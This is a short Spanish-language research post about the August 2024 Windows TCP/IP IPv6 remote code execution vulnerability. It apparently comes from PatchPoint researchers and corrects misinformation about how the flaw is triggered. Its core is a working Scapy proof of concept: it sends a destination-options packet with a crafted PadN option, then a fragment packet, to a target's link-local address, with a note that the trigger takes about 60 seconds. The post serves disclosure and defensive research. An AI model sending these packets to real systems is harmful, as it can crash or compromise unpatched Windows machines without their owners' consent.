
En agosto de 2024, Microsoft publicó un parche para una vulnerabilidad de ejecución remota de código (RCE) en TCP/IP de Windows. Algunos investigadores ya han publicado pruebas de concepto (PoC) para esta vulnerabilidad y, casi al mismo tiempo, los investigadores de PatchPoint también completaron su análisis y reproducción de este problema. Debido a la propagación de desinformación en varias plataformas, incluida Twitter, parece que los puntos críticos necesarios para desencadenar esta vulnerabilidad se han malinterpretado. Contrariamente a estas imprecisiones, hemos decidido publicar una PoC que demuestra cómo se puede desencadenar esta vulnerabilidad con la transmisión de solo dos paquetes.; En realidad, no es necesario un gran número de paquetes para desencadenar esta vulnerabilidad.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Para desencadenar la vulnerabilidad, se requiere un tiempo de espera de aproximadamente 60 segundos